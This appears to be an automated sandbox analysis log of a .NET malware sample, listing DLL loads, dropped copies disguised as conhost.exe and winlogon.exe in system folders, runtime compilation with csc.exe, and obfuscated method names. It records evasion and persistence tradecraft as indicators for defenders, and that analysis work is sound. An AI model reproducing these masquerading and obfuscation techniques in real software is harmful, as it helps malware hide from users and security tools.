                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: apphelp.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: version.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: wldp.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: profapi.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: mscoree.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: version.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: wldp.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: profapi.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: mscoree.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: version.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: wldp.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ksuser.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Directory created: C:\Program Files\Windows Defender\en-GB\conhost.exe
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Directory created: C:\Program Files\Windows Defender\en-GB\088424020bedd6
Source: 4si9noTBNw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 4si9noTBNw.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4si9noTBNw.exe | Static file information: File size 1920000 > 1048576
Source: 4si9noTBNw.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d4400
Source: 4si9noTBNw.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.pdb source: 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs | .Net Code: Type.GetTypeFromHandle(ngg76RL3TjpoK8hs6gh.fPMnILReVCf(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ngg76RL3TjpoK8hs6gh.fPMnILReVCf(16777245)),Type.GetTypeFromHandle(ngg76RL3TjpoK8hs6gh.fPMnILReVCf(16777259))})
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9BC7E35B pushad ; ret 0_2_00007FFD9BC7E35C
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9BC761B1 push ebp; ret 0_2_00007FFD9BC761D8
Source: 4si9noTBNw.exe | Static PE information: section name: .text entropy: 7.53942476676294
Source: VTixufCejPQZEvXiB.exe.0.dr | Static PE information: section name: .text entropy: 7.53942476676294
Source: VTixufCejPQZEvXiB.exe0.0.dr | Static PE information: section name: .text entropy: 7.53942476676294
Source: VTixufCejPQZEvXiB.exe1.0.dr | Static PE information: section name: .text entropy: 7.53942476676294
Source: conhost.exe.0.dr | Static PE information: section name: .text entropy: 7.53942476676294
Source: 4si9noTBNw.exe, IWPQttnkpFdSgFyq8vn.cs | High entropy of concatenated method names: 'WU6P6ZscMb', 'oog8m3b5nUCjCqfjrsqq', 'qDaAu9b5P2xhyGYyphuU', 'm6UNAYb5diSZviucc8Qv', 'GNpgK5b5IVee6vUlEuww', 'vsdj4Db54SBU7p91U995', 'UoUYq1b5b1b50yLDuGOf', 'tuQRK8b5Kh2f4MEcG3pM', 'eRBYDqb56k2IZRmwEW3b', 'tDPP40EJFt'
Source: 4si9noTBNw.exe, eOMvH46bWfJR42MeJJU.cs | High entropy of concatenated method names: 'Ecn6P1MItW', 'HpU6dKkpaf', 'MHD6ISnf35', 'fXl6i4buHE74D7UjAjGX', 'CHTidlbuMRHRTVDtFMbx', 'ESNfm0bu3LEmrZQeQUru', 'BJTcqXbu7CXSOIOjZpns', 'FoRrx9buyqb1OsgOBba6', 'VZDqxTbuJ1k3Sj922N22', 'V2Djxmbu9LlqIN1FFHU4'
Source: 4si9noTBNw.exe, HI2jHDJU3ecyZiDQa9.cs | High entropy of concatenated method names: 'eSuSu2S5b', 'k9q4ffbwBfdk5s3CVKgj', 'aS8P6ubwWvh8etxCNrOs', 'VyWXZDbwpRBF4XQNfgF6', 'JlRrEGbw5VAmARex4d9x', 'A651V7MJZ', 'aUrl1Gneq', 'ocpiY9WnP', 'QYdXLkmQW', 'jfvvyeFeN'
Source: 4si9noTBNw.exe, HrrwsKRmpPclrQAyF0B.cs | High entropy of concatenated method names: 'x3dRhudCSW', 'uYnS3dbrpdB2aavyRcli', 'v0tbu6br5XWIkGLHKceF', 'ty09rlbrw6EMxYnmFgtK', 'vLgqkubroiaYxIt1wyCW', 'tneRAAbrBfvjsoyiUylZ', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 4si9noTBNw.exe, YKq4Thlt6OVYpMvt5bL.cs | High entropy of concatenated method names: 'iKIbUyi2AhP', 'DTuljUngoG', 'CSKbUJPKaox', 'odcxEcb8ZUBgjydJH21D', 'uu6iQ4b8FGKPZNTHmL9R', 'tyW1TPb8NR5VWeP2htKI', 'j2yxVqb8TATlWKUHkc4K', 'sOPdAjb8V4gUGUTBaOyp', 'moPF3Gb8tEAn0ihrSNva', 'RLnvBVb8k56ggAp0ue6p'
Source: 4si9noTBNw.exe, Q5VRT9UZTk9rE45gpvL.cs | High entropy of concatenated method names: 'bW7UamqP1S', 'wBNJXdbC15oxZmVZFE6u', 'MrLkJBbCJpNdvf9pKTMT', 'QOyGyHbC9kVMPQICt6aW', 'mm9CQpbCllVoPA1Snqbg', 'P9X', 'vmethod_0', 'FRKbdoKAhHM', 'imethod_0', 'wlPCRjbCHLi8mIW4LtvD'
Source: 4si9noTBNw.exe, x8Jksr1RuEDR7xN2W4D.cs | High entropy of concatenated method names: 'Os31ZA0mbi', 'cWu1FflfiJ', 'zhl1Vd0xWw', 'YRuS3ObcBA0NuhgboO9k', 'hMSWGCbcWFMlCqw60sDg', 'jQa5cfbcpbxEAbWUxcOf', 'pMP2dObc5B9Msy26auA1', 'MgM1cS1i9P', 'bZs18d6kkp', 'DTt1GJh1h0'
Source: 4si9noTBNw.exe, vvtPHoKSrjDPpiCEKwA.cs | High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'zTlbUOh9UNn', 'b3Obdbm8D8P', 'vqyIDMbDjSFIgcEsoTNI', 'pq9maDbDenZRE9F5dm4n', 'Y92oxSbDrt16vOMwrDiH'
Source: 4si9noTBNw.exe, JC5kapYjMG06T6wktBW.cs | High entropy of concatenated method names: 'VLCYrxE4Tb', 'wacYgPFeqW', 'ks7YaC5xo9', 'GBPY0sxO9e', 'flZYEy8aGB', 'eQRAADbT6OQnUx6uy4t1', 'F39giJbTId2MdgWGNNoM', 'hRbmNhbTK2dDGVP7CdSr', 'zJYEtXbTUob235Fh6KB4', 'AFcoSjbTm9u1UKbtNq2K'
Source: 4si9noTBNw.exe, J3NntmK8R9wK1mKZPCw.cs | High entropy of concatenated method names: 'GcBKa6KAwn', 'xIVK0xATWb', 'ys0KELnVo0', 'E7iChLbuO7UvBELYXZnD', 'xr9dAPbu2lZvH4XTJ3LD', 'PljUk4buUM14HtpYuvfN', 'I4EljmbumyMrMfnlsH5G', 'qaDKNEg5Hv', 'ASXKTu1tn5', 'k4bKZoFxAj'
Source: 4si9noTBNw.exe, NPma2Yw2dcDehopWD9e.cs | High entropy of concatenated method names: 'MTmwMVEpxX', 'zrSw3HQeOP', 'oU4wHgHXBX', 'RjVw7kHnkR', 'Xiawyy3bMD', 'l2kQM8bZwdkZF6UTvC6Q', 'puDulrbZhrJrO11T62LP', 'f5ml4ZbZQ9RDF0lLsX9k', 'GwbBvwbZo3d8w5A94uwa', 'AWvtcObZpB9JT6gFxKII'
Source: 4si9noTBNw.exe, R76a7YPwl28Hgq7meLA.cs | High entropy of concatenated method names: 'iSJPGa8i8T', 'id8PNLQ8Zj', 'yoqPT9oOYn', 'FaOsxLb5tonCyLcDe2Jn', 'yLdvG1b5kdreUxd4aXCn', 'WkVgSwb5Fu7kE55MeQdh', 'Q3xsjtb5VQEAFmlfsE0A', 'osePppY2er', 'LsWP50GfHo', 'MolPBwdfwm'
Source: 4si9noTBNw.exe, MEvjowIjcYufCjRH4QI.cs | High entropy of concatenated method names: 'dReIEDv2tp', 'y7lILyqriC', 'srlIqinjAh', 'OPbIzRCfNB', 'jiQK4TjEAa', 'jIRKbdoH0T', 'N7tKnFF6X2', 'H1sr6DbDXYnA2ENXXOop', 'kVkBqcbDlQSjdML2YQNV', 'VeiaOobDiNTc43x2qKXu'
Source: 4si9noTBNw.exe, sUDVcHnIDy6VfX8GsQ4.cs | High entropy of concatenated method names: 'DNXn6BrrtY', 'XRHnUWV7ln', 'uionmj8kxv', 'DmZnO1108C', 'MBaGWubp3rtYXXUWyEZj', 'pe0HHubpf4fOOhDGRtsU', 'j8dP7ybpMFKl10Eq1vC1', 'TNpqFIbpHD2O0O66f1d8', 'esE3ndbp72HkLcJE02GN', 'q8Ar0Gbpyh85Es9SKioF'
Source: 4si9noTBNw.exe, AFlFQUrWHcMVNLhwyip.cs | High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'tVoruZlanw', 'R4Ey3xbaqk0Wk8Sm2iNH', 'c0WuS7bazHf8mCFmbTtH', 'YrNQCwb04jVRjuvjt5ry', 'TiqtKcb0bI13EU8S0juV', 'nvSnVfb0n9ml38g7loNc', 'JJIQF9b0Ptr1IXlGnIN3'
Source: 4si9noTBNw.exe, aKugbDacY1m1306t5cA.cs | High entropy of concatenated method names: 'method_0', 'method_1', 'blSaGsI9kJ', 'INwaNHCNkk', 'OfRaTKMDLa', 'Dispose', 'emE4tabE8dCISDvI42vN', 'zIEqtjbEGEugwgbjyVvj', 'TLTpJrbENP4K4pXle0Cg', 'nBxjyMbETd6PxAnuVJlX'
Source: 4si9noTBNw.exe, QRa5f36889vQVIaXJtO.cs | High entropy of concatenated method names: 'jMj6aAD2vq', 'pog60BHxNw', 'Qsbs25bSyQuYhpQtruiZ', 'xxxogIbSHAn0ExKPVliv', 'HMoK20bS7h49lYWAokJQ', 'jIL6N95DkD', 'MEN6T8vRM3', 'N7q6Z4DcFE', 'FLM6FUFag0', 'd5q6VY8Ulm'
Source: 4si9noTBNw.exe, IPIrIvUyIgwrV3PTZIb.cs | High entropy of concatenated method names: 'LHuUlxwBWl', 'f0ZMwxbSNyEmjPnyxEPa', 'ndMsqFbS8I1QjGXdF4Yl', 'xIuy9fbSGcCX4UkrXB8H', 'piw1fkbSTP5anGPm0xNp', 'jUlU9HScGr', 'D4wtNqbSxUbDFm0ZayhR', 'Ov3BgsbSsRSMg45PQrMM', 'akkNcybSRODxkYiODCXj', 'X9a6APbSSWLloe5A71HY'
Source: 4si9noTBNw.exe, VClUh2z1y17W48lUVm.cs | High entropy of concatenated method names: 'a0Vbb91lv0', 'pI2bPWOvBB', 't39bdq65aB', 'WCxbIsL7rC', 'JS4bK7eu4v', 'jP8b6YPuHx', 'FQebmv3EVp', 'vLsrl3boIRaV0LcC0heY', 'Mk0o5xboKbKamt34BfC2', 'SkWeaObo6MTB2pXjku8W'
Source: 4si9noTBNw.exe, rIPkTIo8Dd3y76hx0Id.cs | High entropy of concatenated method names: 'qT7oLfQJ6A', 'MLgozW2vUN', 'YM9oNd5iTq', 'cwMoTOc9CQ', 'a0hoZua6oU', 'gLmoF9KRf4', 'jHpoVJ4VHF', 'Av6otRxStm', 'swLokjiuMW', 'eAIojJOJnq'
Source: 4si9noTBNw.exe, FrNNtTUcfWY6uQE5Y5r.cs | High entropy of concatenated method names: 'P9X', 'u35bUfodk6A', 'imethod_0', 'kaVUGArq7o', 'M6GVgqbC6TApDxlrkcHt', 'vklcwtbCU4xZUHeLktiB', 'jHs5pKbCm9KNw3SFalsp', 'h6a0tCbCOaFUcgEjkn1s', 'pSI9QIbC2h7EOLCnUm05'
